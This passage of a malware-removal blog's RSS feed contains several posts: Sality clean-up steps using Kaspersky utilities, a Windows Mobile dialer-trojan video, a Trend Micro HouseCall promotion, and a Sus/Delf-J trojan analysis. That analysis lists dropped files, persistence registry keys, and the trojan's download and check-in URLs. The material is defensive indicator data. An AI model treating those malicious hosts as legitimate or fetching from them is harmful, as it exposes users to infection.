<div>Click <strong>OK</p>
<p></strong></div>
</li>
</ul>
</li>
<li>Download the file <strong><span style="text-decoration: underline;"><a onclick="trackFile(this, 'sality_regkeys.zip');" href="http://support.kaspersky.com/downloads/utils/sality_regkeys.zip"><em>Sality_RegKeys.zip</em></a></span></strong> </li>
<li>
<div>Unpack the file <strong>Sality_RegKeys.zip</strong></div>
</li>
<li>
<div>Run the file <strong>Disable_autorun.reg</strong> from the archive <strong>Sality_RegKeys.zip</strong> </p>
<p>You can also disable autorun from all devices by running the <strong>SalityKiller</strong> utility with parameter <strong>-a</strong>.</div>
</li>
<li>
<div>Click <strong>Yes</strong> to confirm adding the information to the registry</div>
</li>
</ul>
<blockquote dir="ltr">
<p><img src="http://www.virusexperts.org/wp-content/uploads/HLIC/13338b08639c6cd439546c11c45f51e7.jpg" border="0" alt="" width="483" height="109" /></p>
</blockquote>
<p> </p>
<ul dir="ltr">
<li>
<div>Update the anti-virus databases (threat signatures) for the installed Kaspersky Lab’s product. If you cannot download the necessary databases (threat signatures) form the Internet, update the databases from the zip archives:</div>
<ul>
<li><a href="http://support.kaspersky.com/faq/?qid=193238849"><strong>how to update Kaspersky Lab’s products version 5.0 from the zip archives</strong></a><strong> </strong></li>
<li><a href="http://support.kaspersky.com/faq/?qid=208279232"><strong>how to update Kaspersky Lab’s products version 6.0 from the zip archives</strong></a><strong> </strong></li>
<li><a href="http://support.kaspersky.com/faq/?qid=208279442"><strong>how to update Kaspersky Lab’s products version 7.0 from the zip archives</strong></a><strong> </strong></li>
</ul>
</li>
<li>set the full scan options to their <a href="http://support.kaspersky.com/faq/?qid=208279711"><strong>maximum scan level</strong></a> </li>
<li>run full computer scan </li>
<li>once the scan is over, from the archive <strong>Sality_RegKeys.zip</strong> run the file of the registry key: 
<ul>
<li>under <strong>Windows 2000</strong> run the registry file <strong>SafeBootWin200.reg</strong> </li>
<li>under <strong>Windows XP</strong> run the registry file <strong>SafeBootWinXP.reg</strong> </li>
<li>under <strong>Windows 2003</strong> run the registry file <strong>SafeBootWinServer2003.reg</strong> </li>
<li>under <strong>Windows Vista</strong> run the registry file <strong>SafebootVista.reg</strong></li>
</ul>
</li>
</ul>
<p dir="ltr"><strong> </strong></p>
<blockquote dir="ltr">
<p dir="ltr">You can restore the registry branch <strong>SafeBoot </strong>which is needed for a PC to be able to boot in safe mode, by running <strong>SalityKiller.exe</strong> with parameter <strong>-j.</strong></p>
</blockquote>
<p dir="ltr">Additional parameters to run <strong>SalityKiller.exe</strong> from command line:</p>
<p dir="ltr">-<strong>p &lt;path&gt;</strong> &#8211; scan a specific folder;<br /><strong>-n</strong> &#8211; scan network disks;<br /><strong>-r</strong> &#8211; scan flash drives, scan removable hard disks connected via USB and Fire Wire;<br /><strong>-y</strong> &#8211; close the window when the utility finishes;<br /><strong>-s</strong> - scan in &#8220;silent&#8221; mode (without opening console box);<br /><strong>-l &lt;file_name&gt;</strong> &#8211; write log to the file;<br /><strong>-v</strong> &#8211; detailed logging (must be used in combination with -l);<br /><strong>-x</strong> - restore possibility to view hidden and system files;<br /><strong>-a</strong> &#8211; disable autorun from any devices;<br /><strong>-j</strong> &#8211; restore the registry branch SafeBoot (if it is deleted, the PC will not be able to start up in<strong> Safe mode</strong>);<br /><strong>-m</strong> &#8211; monitoring mode to protect the system from getting infected;<br /><strong>-q</strong> &#8211; scan the system and then go to monitoring mode;<br /><strong>-k</strong> – the utility will scan all disks, detect files autorun.inf created by the virus Virus.Win32.Sality and eliminate them. It will also delete the executable file linked by autorun.inf, even if such file has been already disinfected.</p>
<p dir="ltr"> </p>
<p dir="ltr"> </p>


<br /><h3><p>Related posts:</h3><ol><li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/how-to-remove-viruswin32salityaa-win32salityam-w32salityah/' rel='bookmark' title='Permanent Link: How To Remove Virus.Win32.Sality.aa Win32/Sality.AM W32/Sality.ah'>How To Remove Virus.Win32.Sality.aa Win32/Sality.AM W32/Sality.ah</a></li>
<li><a href='http://www.virusexperts.org/security-news/new-sality-virus-in-sight-viruswin32salityaa-win32salityam-w32salityah/' rel='bookmark' title='Permanent Link: New Sality Virus In Sight ( Virus.Win32.Sality.aa Win32/Sality.AM W32/Sality.ah )'>New Sality Virus In Sight ( Virus.Win32.Sality.aa Win32/Sality.AM W32/Sality.ah )</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/fix-exe-extension-for-viruswin32salityaa-win32salityam-w32salityah-infected-pc/' rel='bookmark' title='Permanent Link: Fix .exe extension for ( Virus.Win32.Sality.aa Win32/Sality.AM W32/Sality.ah ) infected PC'>Fix .exe extension for ( Virus.Win32.Sality.aa Win32/Sality.AM W32/Sality.ah ) infected PC</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.virusexperts.org/removal-tips-tools-and-videos/how-to-remove-and-fix-virus-win32-sality-win32sality-ah-win32sality-ag-with-kaspersky-tools/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to remove International dialer Trojan on 3D Anti Terrorist (Windows Mobile) (Video)</title>
		<link>http://www.virusexperts.org/removal-tips-tools-and-videos/how-to-remove-international-dialer-trojan-on-3d-anti-terrorist-windows-mobile-video/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=how-to-remove-international-dialer-trojan-on-3d-anti-terrorist-windows-mobile-video</link>
		<comments>http://www.virusexperts.org/removal-tips-tools-and-videos/how-to-remove-international-dialer-trojan-on-3d-anti-terrorist-windows-mobile-video/#comments</comments>
		<pubDate>Mon, 12 Apr 2010 07:20:30 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Removal Tips,Tools and Videos]]></category>
		<category><![CDATA[Trojan]]></category>
		<category><![CDATA[youtube]]></category>

		<guid isPermaLink="false">http://www.virusexperts.org/?p=2390</guid>
		<description><![CDATA[


 
You will need a Reg Editor, Notification queue Manager, File Explorer 
( we are using http://www.dotfred.net/TaskMgr.htm in the video )
 


Related Blogs




Related posts:Windows Mobile Terdial Trojan makes expensive phone calls
The New Version of Swizzor Trojan Not Detected Yet and How to Remove it Manually
How to Remove All Types of Magania (W32_Gammima,Trojan-GameThief,Taterf,Win32.Inhoo) Trojan


<h3>
Related posts:</h3><ol><li><a href='http://www.virusexperts.org/security-news/windows-mobile-terdial-trojan-makes-expensive-phone-calls/' rel='bookmark' title='Permanent Link: Windows Mobile Terdial Trojan makes expensive phone calls'>Windows Mobile Terdial Trojan makes expensive phone calls</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/the-new-version-of-swizzor-trojan-not-detected-yet-and-how-to-remove-it-manually/' rel='bookmark' title='Permanent Link: The New Version of Swizzor Trojan Not Detected Yet and How to Remove it Manually'>The New Version of Swizzor Trojan Not Detected Yet and How to Remove it Manually</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-all-types-of-magania-w32_gammimatrojan-gamethieftaterfwin32-inhoo-trojan/' rel='bookmark' title='Permanent Link: How to Remove All Types of Magania (W32_Gammima,Trojan-GameThief,Taterf,Win32.Inhoo) Trojan'>How to Remove All Types of Magania (W32_Gammima,Trojan-GameThief,Taterf,Win32.Inhoo) Trojan</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;">
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="480" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/ALGJDCKTJyI&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="480" height="385" src="http://www.youtube.com/v/ALGJDCKTJyI&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object>
</p>
<p style="text-align: left;"> </p>
<p style="text-align: center;"><strong>You will need a Reg Editor, Notification queue Manager, File Explorer </strong></p>
<p style="text-align: center;"><strong>( we are using http://www.dotfred.net/TaskMgr.htm in the video )</strong></p>
<p style="text-align: center;"> </p>
<p style="text-align: center;"><strong><br /></strong></p>
<p><!-- pingbacker_start --><br />
<h3>Related Blogs</h3>
<ul class='pc_pingback'></ul>
<p><!-- pingbacker_end --></p>


<br /><h3><p>Related posts:</h3><ol><li><a href='http://www.virusexperts.org/security-news/windows-mobile-terdial-trojan-makes-expensive-phone-calls/' rel='bookmark' title='Permanent Link: Windows Mobile Terdial Trojan makes expensive phone calls'>Windows Mobile Terdial Trojan makes expensive phone calls</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/the-new-version-of-swizzor-trojan-not-detected-yet-and-how-to-remove-it-manually/' rel='bookmark' title='Permanent Link: The New Version of Swizzor Trojan Not Detected Yet and How to Remove it Manually'>The New Version of Swizzor Trojan Not Detected Yet and How to Remove it Manually</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-all-types-of-magania-w32_gammimatrojan-gamethieftaterfwin32-inhoo-trojan/' rel='bookmark' title='Permanent Link: How to Remove All Types of Magania (W32_Gammima,Trojan-GameThief,Taterf,Win32.Inhoo) Trojan'>How to Remove All Types of Magania (W32_Gammima,Trojan-GameThief,Taterf,Win32.Inhoo) Trojan</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.virusexperts.org/removal-tips-tools-and-videos/how-to-remove-international-dialer-trojan-on-3d-anti-terrorist-windows-mobile-video/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>HouseCall &#8211; Free Online Virus Scan NEW v7.1</title>
		<link>http://www.virusexperts.org/removal-tips-tools-and-videos/housecall-free-online-virus-scan-new-v7-1/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=housecall-free-online-virus-scan-new-v7-1</link>
		<comments>http://www.virusexperts.org/removal-tips-tools-and-videos/housecall-free-online-virus-scan-new-v7-1/#comments</comments>
		<pubDate>Sun, 11 Apr 2010 07:29:22 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Removal Tips,Tools and Videos]]></category>
		<category><![CDATA[Antivirus]]></category>
		<category><![CDATA[Free]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Online]]></category>
		<category><![CDATA[Protection]]></category>
		<category><![CDATA[Scanner]]></category>
		<category><![CDATA[Scanners]]></category>
		<category><![CDATA[Support]]></category>
		<category><![CDATA[Test]]></category>
		<category><![CDATA[trend micro]]></category>
		<category><![CDATA[Trojan]]></category>

		<guid isPermaLink="false">http://www.virusexperts.org/?p=2366</guid>
		<description><![CDATA[
HouseCall is Trend Micro&#8217;s highly popular and capable on-demand scanner for identifying and removing viruses, Trojans, worms, unwanted browser plugins, and other malware.
 
 
HouseCall 7 features an intuitive interface and the ability to perform fast scans that target critical system areas and active malware. It also leverages the Trend Micro Smart Protection Network™ to help ensure [...]

<h3>
Related posts:</h3><ol><li><a href='http://www.virusexperts.org/protection-tools/60-free-online-virus-trojan-spyware-and-malware-scanners-scan-or-removal/' rel='bookmark' title='Permanent Link: 60 Free Online Virus, Trojan, Spyware and Malware Scanners (Scan or Removal)'>60 Free Online Virus, Trojan, Spyware and Malware Scanners (Scan or Removal)</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/new-free-superantispyware-online-scannerremover/' rel='bookmark' title='Permanent Link: New Free SUPERAntiSpyware Online Scanner/Remover!'>New Free SUPERAntiSpyware Online Scanner/Remover!</a></li>
<li><a href='http://www.virusexperts.org/protection-tools/free-sophos-endpoint-assessment-free-online-test/' rel='bookmark' title='Permanent Link: Free Sophos Endpoint Assessment Free Online Test'>Free Sophos Endpoint Assessment Free Online Test</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" title="house call" src="http://www.virusexperts.org/wp-content/uploads/HLIC/a44148184343a3ff80e2612bd494c282.gif" alt="" width="80" height="80" /></p>
<p style="text-align: justify;">HouseCall is Trend Micro&#8217;s highly popular and capable on-demand scanner for identifying and removing viruses, Trojans, worms, unwanted browser plugins, and other malware.</p>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;"> </p>
<p>HouseCall 7 features an intuitive interface and the ability to perform fast scans that target critical system areas and active malware. It also leverages the Trend Micro Smart Protection Network™ to help ensure that scans catch the latest threats.</p>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;"> </p>
<p>HouseCall 7.1 improves on the recently released HouseCall 7.0 by providing a full system scan option and an option to scan only specific folders. It adds support for 64-bit versions of Windows Vista™ and Windows™ 7.</p>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;"> </p>
<p>HouseCall provides a quick and easy check for threats regardless of the protection status of your existing security solution. For more information about HouseCall, please read the Frequently Asked Questions.</p>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;"> </p>
<h3>What&#8217;s new in HouseCall?</h3>
<ul>
<li style="text-align: justify;">Full system and custom scan options allow users to specify which folders to scan (new in 7.1).</li>
<li style="text-align: justify;">Quick scan option offers targeted scanning of critical system areas and active threats, reducing scan times to within a few minutes.</li>
<li style="text-align: justify;">Stand-alone, browser-independent implementation eliminates compatibility issues associated with browser-activated scanners.</li>
<li style="text-align: justify;">Smart Scan technology refers to patterns in the cloud, delivering the latest protection while reducing download times. </li>
<li style="text-align: justify;">Smart Feedback shares threat information with the Smart Protection Network, which correlates data from a global intelligence network to quickly discover new threats. </li>
<li style="text-align: justify;">Review and restore lets you check and compare scan results and recover files.</li>
<li style="text-align: justify;">Enhanced detection and cleanup addresses rootkits and other sophisticated threats.</li>
</ul>
<p> </p>
<p style="text-align: center;"><a onclick="dcsMultiTrack('DCS.dcssip','free.antivirus.com','DCS.dcsuri','/download/HouseCall71','WT.ti','Free Tools Download: HouseCall71','WT.cg_n','CON - Tools','WT.cg_s','HouseCall71','WT.si_n','Tool Op - CON','WT.si_x','2','WT.seg_3','CON - Tools','WT.seg_4','HouseCall70','WT.dl','20');" rel="nofollow" href="http://go.trendmicro.com/housecall7/HousecallLauncher.exe"><img src="http://www.virusexperts.org/wp-content/uploads/HLIC/53b873482839f73c9f6205935e13123d.gif" alt="HouseCall 7.1" width="20" height="20" /></a><a onclick="dcsMultiTrack('DCS.dcssip','free.antivirus.com','DCS.dcsuri','/download/HouseCall71','WT.ti','Free Tools Download: HouseCall71','WT.cg_n','CON - Tools','WT.cg_s','HoueCall71','WT.si_n','Tool Op - CON','WT.si_x','2','WT.seg_3','CON - Tools','WT.seg_4','HouseCall70','WT.dl','20');" rel="nofollow" href="http://go.trendmicro.com/housecall7/HousecallLauncher.exe"> Download HouseCall 7.1 (32-bit)</a> | <a rel="nofollow" href="http://go.trendmicro.com/housecall7/HousecallLauncher64.exe"><img src="http://www.virusexperts.org/wp-content/uploads/HLIC/53b873482839f73c9f6205935e13123d.gif" alt="download icon" width="20" height="20" /></a><a rel="nofollow" href="http://go.trendmicro.com/housecall7/HousecallLauncher64.exe"> Download HouseCall 7.1 (64-bit)</a></p>
<p> </p>
<h3>Getting Started with HouseCall</h3>
<ol>
<li style="text-align: justify;">Click <strong>Download HouseCall</strong> to begin. Please note that HouseCall requires a small download before it can scan your computer.</li>
<li style="text-align: justify;">You can choose to save a copy of the launcher (HousecallLauncher.exe) and use it to quickly starts scan. Remember to visit this page occasionally to get the latest copy of the launcher. </li>
<li style="text-align: justify;"> It is recommended that first-time users select the Quick Scan option, which is available in addition to the Full Scan or Folder Scan options.</li>
<li style="text-align: justify;">Enabling the Smart Feedback setting helps increase the strength of the Smart Protection Network by sharing malware and threat data as part of our global neighborhood watch program.  No personally identifiable information is gathered as part of participation. </li>
</ol>
<p><!-- pingbacker_start --><br />
<h3>Related Blogs</h3>
<ul class='pc_pingback'></ul>
<p><!-- pingbacker_end --></p>


<br /><h3><p>Related posts:</h3><ol><li><a href='http://www.virusexperts.org/protection-tools/60-free-online-virus-trojan-spyware-and-malware-scanners-scan-or-removal/' rel='bookmark' title='Permanent Link: 60 Free Online Virus, Trojan, Spyware and Malware Scanners (Scan or Removal)'>60 Free Online Virus, Trojan, Spyware and Malware Scanners (Scan or Removal)</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/new-free-superantispyware-online-scannerremover/' rel='bookmark' title='Permanent Link: New Free SUPERAntiSpyware Online Scanner/Remover!'>New Free SUPERAntiSpyware Online Scanner/Remover!</a></li>
<li><a href='http://www.virusexperts.org/protection-tools/free-sophos-endpoint-assessment-free-online-test/' rel='bookmark' title='Permanent Link: Free Sophos Endpoint Assessment Free Online Test'>Free Sophos Endpoint Assessment Free Online Test</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.virusexperts.org/removal-tips-tools-and-videos/housecall-free-online-virus-scan-new-v7-1/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Removal tool for Sus/Delf-J, Trojan.Heur.GZ.kGX@bKStsDeG (Foto_253.com, javahr.exe, javahr2.exe, javahu.exe) Trojan</title>
		<link>http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-susdelf-j-trojan-heur-gz-kgxbkstsdeg-foto_253-com-javahr-exe-javahr2-exe-javahu-exe-trojan/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=removal-tool-for-susdelf-j-trojan-heur-gz-kgxbkstsdeg-foto_253-com-javahr-exe-javahr2-exe-javahu-exe-trojan</link>
		<comments>http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-susdelf-j-trojan-heur-gz-kgxbkstsdeg-foto_253-com-javahr-exe-javahr2-exe-javahu-exe-trojan/#comments</comments>
		<pubDate>Sun, 04 Apr 2010 17:37:14 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Removal Tips,Tools and Videos]]></category>
		<category><![CDATA[Not Detected]]></category>
		<category><![CDATA[Removal]]></category>
		<category><![CDATA[removal tool]]></category>
		<category><![CDATA[Removal Tools]]></category>
		<category><![CDATA[Trojan]]></category>
		<category><![CDATA[trojan removal tool]]></category>
		<category><![CDATA[virusexperts.org]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.virusexperts.org/?p=2318</guid>
		<description><![CDATA[
 
 
 
 

 
Severity Level : 7/10
 
Alias:

Sus/Delf-J [Sophos]
NOT Detected [McAfee]
NOT Detected [Kaspersky Lab]
NOT Detected [Microsoft]

 
Foto_253.com VirusTotal Report : (Click Here)
 
File System Modifications
The following files were created in the system:
 

%systemdrive%\path\ javahr.exe
%systemdrive%\path\ javahr2.exe 
%systemdrive%\path\ javahn.dll 
%systemdrive%\uacpath\javahu.exe 

 
Note: 

%system% is a variable that refers to the System folder. By default, this is &#8220;C:\Windows\System&#8221; (Windows 95/98/Me), &#8220;C:\Winnt\System32&#8243; (Windows NT/2000), or &#8220;C:\Windows\System32&#8243; [...]

<h3>
Related posts:</h3><ol><li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-win32-genome-aocx-susbehav-1021-outlook-exe-brazilian-exe-sysinternals-exe-trojan-downloader/' rel='bookmark' title='Permanent Link: Removal tool for Win32.Genome.aocx (outlook.exe, brazilian.exe, sysinternals.exe) Trojan-Downloader'>Removal tool for Win32.Genome.aocx (outlook.exe, brazilian.exe, sysinternals.exe) Trojan-Downloader</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-w32vbsauto-c-vbsslogod-x-startup-scr-winxp-exe-winjpg-jpg-m-p-jpg-worm/' rel='bookmark' title='Permanent Link: Removal tool for W32/VBSAuto-C, VBS/Slogod.X (Startup.scr, winxp.exe, winjpg.jpg, M.p.jpg) WORM'>Removal tool for W32/VBSAuto-C, VBS/Slogod.X (Startup.scr, winxp.exe, winjpg.jpg, M.p.jpg) WORM</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-trojdwnldr-ici-win32-genome-aodo-windowsupdate-exe-updt-exe-trojan/' rel='bookmark' title='Permanent Link: Removal tool for Troj/DwnLdr-ICI, Win32.Genome.aodo (windowsupdate.exe, updt.exe) Trojan'>Removal tool for Troj/DwnLdr-ICI, Win32.Genome.aodo (windowsupdate.exe, updt.exe) Trojan</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p style="border: 0px none; margin: 0px; padding: 0px; text-align: center;"><img class="aligncenter size-full wp-image-2320" title="sus-delf-j" src="http://www.virusexperts.org/wp-content/uploads/2010/04/sus-delf-j.png" alt="" width="250" height="250" /></p>
<p style="border: 0px none ; margin: 0px; padding: 0px; text-align: center;"><span id="PresenceContainer"><strong><br /></strong></span><span id="PresenceContainer"><strong> </strong></span></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><span id="more-2318"></span></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><span style="color: #ff0000;"><strong><span style="color: #000000;">Severity Level :</span> 7/10</strong></span></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<h3><strong>Alias:</strong></h3>
<ul>
<li>Sus/Delf-J <span style="color: #ff0000;"><strong>[Sophos]</strong></span></li>
<li>NOT Detected <span style="color: #ff0000;"><strong>[McAfee]</strong></span></li>
<li>NOT Detected <strong><span style="color: #ff0000;">[Kaspersky Lab]</span></strong></li>
<li>NOT Detected<strong> <span style="color: #ff0000;">[Microsoft]</span></strong></li>
</ul>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p><strong><span style="color: #ff0000;">Foto_253.com </span>VirusTotal Report : (<a href="http://www.virustotal.com/analisis/5e2e58a6ae05d5da235e7cd113d7d043290e3d0e416d481f461868ba16a9e56f-1270234187" target="_blank">Click Here</a>)</strong></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<h3>File System Modifications</h3>
<p style="border: 0px none ; margin: 0px; padding: 0px;">The following files were created in the system:</p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<ul>
<li><strong>%systemdrive%\path\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">javahr.exe</span><br /></strong></li>
<li><strong>%systemdrive%\path\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">javahr2.exe</span></strong><strong><span style="color: #ff0000;"> </span></strong></li>
<li><strong>%systemdrive%\path\<span style="color: #ff0000;"> javahn.dll</span></strong><strong><span style="color: #ff0000;"> </span></strong></li>
<li><strong>%systemdrive%\uacpath\<span style="color: #ff0000;">javahu.exe</span></strong><strong><span style="color: #ff0000;"> </span></strong></li>
</ul>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><span style="color: #ff0000;"><strong>Note: </strong></span></p>
<ul>
<li><strong>%system%</strong> is a variable that refers to the System folder. By default, this is <strong>&#8220;C:\Windows\System&#8221;</strong> (Windows 95/98/Me), <strong>&#8220;C:\Winnt\System32&#8243;</strong> (Windows NT/2000), or<strong> &#8220;C:\Windows\System32&#8243;</strong> (Windows XP).</li>
<li><strong>?</strong> = Random file name.</li>
</ul>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<h3>Memory Modifications</h3>
<p style="border: 0px none ; margin: 0px; padding: 0px;">There were new processes created in the system:</p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<table style="margin-bottom: 25px; height: 151px;" border="0" cellspacing="0" cellpadding="5" width="498">
<tbody>
<tr>
<td>
<h3>Process Name</h3>
</td>
<td>
<h3>Process Filename</h3>
</td>
</tr>
<tr>
<td style="text-align: center;"><strong><span style="color: #ff0000;">javahr.exe</span></strong></td>
<td><strong>%systemdrive%\path\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">javahr.exe</span></strong><span style="color: #ff0000;"><strong> </strong></span></td>
</tr>
<tr>
<td style="text-align: center;"><strong><span style="color: #ff0000;">javahr2.exe</span></strong></td>
<td><strong>%systemdrive%\path\<span style="color: #ff0000;"> </span></strong><strong><span style="color: #ff0000;">javahr2.exe</span></strong><strong><span style="color: #ff0000;"> </span></strong></td>
</tr>
<tr>
<td><strong><span style="color: #ff0000;"><br /></span></strong></td>
<td><strong><br /></strong><strong><span style="color: #ff0000;"> </span></strong></td>
</tr>
</tbody>
</table>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<h3>The following Internet action was started (the retrieved bits are saved into the local file):</h3>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<table style="margin-bottom: 25px; height: 125px;" border="0" cellspacing="0" cellpadding="5" width="545">
<tbody>
<tr>
<td>
<h3>URL to be downloaded</h3>
</td>
<td>
<h3>Filename for the downloaded bits</h3>
</td>
</tr>
<tr style="text-align: center;">
<td style="text-align: left;"><strong><span style="color: #ff0000;"><span><a href="http://www.gay24x01.hpg.ig.com.br/">http://www.gay24&#215;01.hpg.ig.com.br/</a></span><br /></span></strong></td>
<td style="text-align: center;"><strong>-<span style="color: #ff0000;"> </span></strong></td>
</tr>
<tr>
<td><a href="http://qer67.com/1mg/am.rar"></a><span style="color: #ff0000;"><strong><span><a href="http://freetimes.boxvirtual.info/LOYDE/in.php" class="broken_link">http://freetimes.boxvirtual.info/LOYDE/in.php</a></span></strong></span></td>
<td style="text-align: center;"><strong>-<span style="color: #ff0000;"> </span></strong></td>
</tr>
<tr>
<td><strong><span style="color: #ff0000;"><span><a href="http://www.sanx04.hpg.ig.com.br" class="broken_link">http://www.sanx04.hpg.ig.com.br</a></span></span></strong></td>
<td style="text-align: center;"><strong>-<span style="color: #ff0000;"> </span></strong></td>
</tr>
<tr>
<td><strong><span style="color: #ff0000;"><a href="http://qer67.com/1mg/am.rar"><br /></a></span></strong></td>
<td style="text-align: center;"><strong>-<span style="color: #ff0000;"> </span></strong></td>
</tr>
</tbody>
</table>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<h3>Registry Modifications</h3>
<p style="border: 0px none ; margin: 0px; padding: 0px;">The newly created or modified Registry Value is:</p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p><strong>[HKEY_CLASSES_ROOT\CLSID\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}]</strong></p>
<p><strong>[HKEY_CLASSES_ROOT\CLSID\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}]<br />@=&#8221;"</strong></p>
<p><strong>[HKEY_CLASSES_ROOT\CLSID\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}\InprocServer32]</strong></p>
<p><strong>[HKEY_CLASSES_ROOT\CLSID\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}\InprocServer32]<br />@=&#8221;c:\\path\\javahn.dll&#8221;</strong></p>
<p><strong>[HKEY_CLASSES_ROOT\CLSID\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}\InprocServer32]<br />&#8220;ThreadingModel&#8221;=&#8221;Apartment&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\rhavaj]</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count]<br />&#8220;HRZR_EHACNGU:P:\\Qbphzragf naq Frggvatf\\Nqzvavfgengbe\\Qrfxgbc\\Sbgb_253(2).pbz&#8221;=hex:01,00,00,00,06,00,00,00,10,79,2b,41,0a,d4,ca,01,</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]<br />&#8220;C:\\Documents and Settings\\Administrator\\Desktop\\Foto_253(2).com&#8221;=&#8221;Foto_253(2)&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]<br />&#8220;C:\\WINDOWS\\system32\\taskmgr.exe&#8221;=&#8221;Windows TaskManager&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]<br />&#8220;c:\\path\\javahr.exe&#8221;=&#8221;javahr&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]<br />&#8220;c:\\path\\javahr2.exe&#8221;=&#8221;javahr2&#8243;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}]<br />@=&#8221;"</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}\InprocServer32]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}\InprocServer32]<br />@=&#8221;c:\\path\\javahn.dll&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F89CEB6F-335E-43EC-BD6B-7F72D7801158}\InprocServer32]<br />&#8220;ThreadingModel&#8221;=&#8221;Apartment&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]</strong></p>
